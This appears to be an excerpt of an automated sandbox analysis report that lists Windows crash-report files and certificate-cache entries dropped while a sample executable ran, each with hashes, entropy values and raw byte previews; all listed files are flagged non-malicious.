                                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.4.8.5.4.8.9.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.8.3.5.6.0.4.8.8.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.b.b.e.d.a.8.-.9.d.f.9.-.4.3.1.d.-.b.0.5.b.-.a.a.7.1.3.4.e.7.c.c.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.d.1.4.5.4.a.-.7.6.5.d.-.4.9.f.d.-.b.7.0.9.-.5.e.e.e.d.b.8.1.5.2.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.h.w.H.s.y.f.s.J.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.8.c.-.0.0.0.1.-.0.0.1.4.-.e.3.1.3.-.a.d.2.0.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.c.8.5.9.d.f.c.4.b.0.d.3.2.f.2.3.8.8.b.5.a.3.8.4.e.6.3.b.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.8.c.8.3.0.e.8.7.8.b.6.f.1.d.5.a.b.6.3.1.8.1.f.e.c.3.d.b.f.4.f.c.9.1.f.2.4.4.2.!.k.h.w.H.s.y.f.s.J.1...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F87.tmp.dmp

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80988
                                                                                                                                                                                                                                                        Entropy (8bit):1.6918236912453386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:z3EtWXDZeOhI/DFaWnI3+rVI1BU23CVU/RYq48QvJbWjW5VNezFlsLcOe:wtmhI/RaGVUUgqUvmJvfaTSc
                                                                                                                                                                                                                                                        MD5:748152C985563DB87D8F2C0A5B19E89C
                                                                                                                                                                                                                                                        SHA1:B5567AE7D7C930877171C0C4477BAAC0AC2094AA
                                                                                                                                                                                                                                                        SHA-256:9E30E9014DC25364B1503B9027A89D77B707BA93E1551C1EBD62F6FED8E27DC1
                                                                                                                                                                                                                                                        SHA-512:CF39069D3EBA45346E8C80CCB17884AB795EB82086435BE75C91007D0B660B6E606895378F7186CD786FF792EE163B3A85223FA31DB50F7D0A1F79EF0BC9DF85
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MDMP..a..... ..........g....................................$....;..........T.......8...........T............!.............. ...........................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER216C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8322
                                                                                                                                                                                                                                                        Entropy (8bit):3.702972060546426
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJg46R6YcDfSUWh1BgmfTtRpr489bHHUsfkNHm:R6lXJf6R6Y4SUWh1BgmfTt5HHHfiG
                                                                                                                                                                                                                                                        MD5:FBB632163D754A388B6C92D6D05868D6
                                                                                                                                                                                                                                                        SHA1:A44BB739E6E6FEA7DAD0EF62B3358729594F973B
                                                                                                                                                                                                                                                        SHA-256:83E933033071305820FE604442030941666EDC1B616B948A7680F985563A62F2
                                                                                                                                                                                                                                                        SHA-512:C6672ABC39BF37D9E98563E13921257122318384E359C3C04576D9FC07BB08570137512AD7E378B1DA52B54B175F81BECE33DC4C3CF6B184B61AF91DF2340609
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.<./.P.i.d.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER21AC.tmp.xml

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4593
                                                                                                                                                                                                                                                        Entropy (8bit):4.483813214537682
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsWJg77aI9dCWpW8VYbYm8M4JhLFF+q88VbaF1V7ghdd:uIjfsI7HD7VnJVVaF1V7ghdd
                                                                                                                                                                                                                                                        MD5:A9009B324E1B7DF8B8CC3275D07973C9
                                                                                                                                                                                                                                                        SHA1:5FF0F6945E6FAA7B34E9F05CCFBA29AAB4297049
                                                                                                                                                                                                                                                        SHA-256:BCEA3CCA7838A5EDD81392CB0A6DA795BE59CBC0BDCAA8D85F5C08E43648836F
                                                                                                                                                                                                                                                        SHA-512:4D293DB2A3D6186CEE0A094178BB01CC03C5B4ED7C6E98A9D17E335524196C70C05C875A5625F1903466837AAACA0A535DA12CEA1B29F258725652BD620CCFA9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER21B9.tmp.csv

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):78048
                                                                                                                                                                                                                                                        Entropy (8bit):3.101197537247237
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:zja3VxHhcT5H4yWFjBCaHuvayZvLrhbBamt6n/w0Em/Q:zja3VxHhcT5H4yWFjBCaHuvayZvLVbBv
                                                                                                                                                                                                                                                        MD5:3F175F6B67B5841D90575F5A6A66263C
                                                                                                                                                                                                                                                        SHA1:23DBE81B1D2478D8FC528E3ECB562626DD58C422
                                                                                                                                                                                                                                                        SHA-256:9703D3474A59F8935A1E434BF821AA7AAD5BBC2C120F4BD7533AA052238B6F9E
                                                                                                                                                                                                                                                        SHA-512:E5F1E63B051C346EAE45804378DCD3EFA1A6F5B7308389C50FA60F97F4730F4C501770558F8E1FF6189C145DD54C1516F7FDE86A5BB28CB707BAB6E9733F9BD9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2208.tmp.txt

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                        Entropy (8bit):2.6852008289137195
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:TiZYWGz3H3rYyYGdW+bHTYEZG3taiI0EjS4wa9Z4buafTeM2uocIo33:2ZDGflZ7A6LafTeM2uobo33
                                                                                                                                                                                                                                                        MD5:E4CAC2C0A15B8A01A1D15ECD42F5069A
                                                                                                                                                                                                                                                        SHA1:8699ECDCD254F8F7FF5AB9F1EB172C3AD9CD03FA
                                                                                                                                                                                                                                                        SHA-256:6DB2F0CFA368912321E2A956361595245BE38843D11C051567B6E48640A92B62
                                                                                                                                                                                                                                                        SHA-512:D4C439A960791CE4F771836BF2D02C997F69EB114AC642803977A36D13130B2E01B8958783452091350D25D23A117DEB6E3BCB75402661F321A8E73E6D8AD765
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                        Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                        MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                        SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                        SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                        SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241023184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241023184215Z....20241030184215Z0...*.H.............$...Q...}oW..X.].2......2d....mOE.x.. sB1p..4..z,A.D7...[...E..JPH.M.&....).q.........V.h.c.............:......T{.....q.`..Z.u.(..b.K..=.ev..F.....inf.T.6$.R.L3E.....Aq.......4'<....S.F|[}}#T.....N.N6.6#Wmu.j..m.d....G...S.{).Pk.....e..{iFO..Q>.&..lG`...,.b.?..Kh4b..q...@'.H.:.{...L.X.ZT...2.gf.!?:...G...*.Z}.$p.f.....}.N.. ...2T...M....8..3..NJj...Z.h.............[..Z.q.<.G(F..j.....'..&.....:..(.Y..s...5A..7....!....4.N..,..O..oU2..5..g...CX.....SZ..A..@=u.0B.gJ......L;..(.9

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                        Entropy (8bit):3.446520245343517
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKj9+M/K8uSJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:hLClkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                        MD5:5DB5D897D05B420C6BEF3279A4C28EB0
                                                                                                                                                                                                                                                        SHA1:16A5DB9377BAA363FF42549B23665A53A9026087
                                                                                                                                                                                                                                                        SHA-256:2B44BB3B3E147E265E33A51743B923E9882313D899C3CC479771BD504C7CF385
                                                                                                                                                                                                                                                        SHA-512:F210229BA1D258E0A6B780DF6212C686A11140FF387E34999901FB067E14A4C7ED7D24F6A61CA0AA95B13B19700A9A6E0606B92243DF7597D8D2E0591D8D0ADA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... .........$...(..(...............................................8V.@.'.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

